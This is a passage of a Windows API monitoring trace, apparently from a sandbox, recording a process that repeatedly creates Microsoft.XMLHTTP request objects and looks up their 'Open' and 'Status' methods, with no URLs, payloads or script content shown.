	[0549.366] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0549.366] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0549.368] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0549.368] SysStringLen (param_1=0x0) returned 0x0
	[0549.368] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0549.368] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0549.368] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0549.368] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0549.368] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0549.368] ??2@YAPEAX_K@Z () returned 0x62f310
	[0549.368] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f310) 
	[0549.368] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0549.369] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0549.369] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0549.369] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0549.369] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0549.369] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0549.371] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0549.371] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0549.371] SysStringLen (param_1=0x0) returned 0x0
	[0549.371] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0549.372] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0549.372] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0549.372] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0549.372] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0549.372] ??2@YAPEAX_K@Z () returned 0x62f330
	[0549.372] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0549.372] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0549.372] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0549.372] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0549.372] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0549.372] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0549.372] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0549.372] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0550.905] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0550.905] SysStringLen (param_1=0x0) returned 0x0
	[0550.905] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0550.906] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0550.906] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0550.906] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0550.906] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0550.906] ??2@YAPEAX_K@Z () returned 0x62f310
	[0550.906] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0550.906] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0550.906] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0550.906] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0550.906] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0550.906] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0550.906] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0550.907] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0550.907] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0550.907] SysStringLen (param_1=0x0) returned 0x0
	[0550.907] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0550.907] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0550.907] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0550.907] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0550.907] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5ba8) returned 0x0
	[0550.907] ??2@YAPEAX_K@Z () returned 0x62f330
	[0550.907] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5ba8, pUnkSite=0x62f330) 
	[0550.907] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0550.907] XMLHTTPRequest:IUnknown:Release (This=0x49c5ba8) returned 0x0
	[0550.908] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0550.908] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0550.908] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0550.908] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0550.908] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0550.908] longjmp () 
	[0550.908] longjmp () 
	[0550.908] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0550.908] SysStringLen (param_1=0x0) returned 0x0
	[0550.908] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0550.909] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0550.909] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0550.909] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0550.909] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7358) returned 0x0
	[0550.909] ??2@YAPEAX_K@Z () returned 0x62f310
	[0550.909] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7358, pUnkSite=0x62f310) 
	[0550.909] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0550.909] XMLHTTPRequest:IUnknown:Release (This=0x49c7358) returned 0x0
	[0550.909] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0550.909] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0550.909] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0550.909] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0550.910] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0550.910] longjmp () 
	[0550.910] longjmp () 
	[0550.910] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0550.910] SysStringLen (param_1=0x0) returned 0x0
	[0550.910] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0550.910] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0550.910] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b80) returned 0x0
	[0550.910] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0550.910] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7258) returned 0x0
	[0550.910] ??2@YAPEAX_K@Z () returned 0x62f330
	[0550.911] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7258, pUnkSite=0x62f330) 
	[0550.911] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0550.911] XMLHTTPRequest:IUnknown:Release (This=0x49c7258) returned 0x0
	[0550.911] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b80) returned 0x0
	[0550.911] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b80) returned 0x3
	[0550.911] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0550.911] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0550.911] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0550.911] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
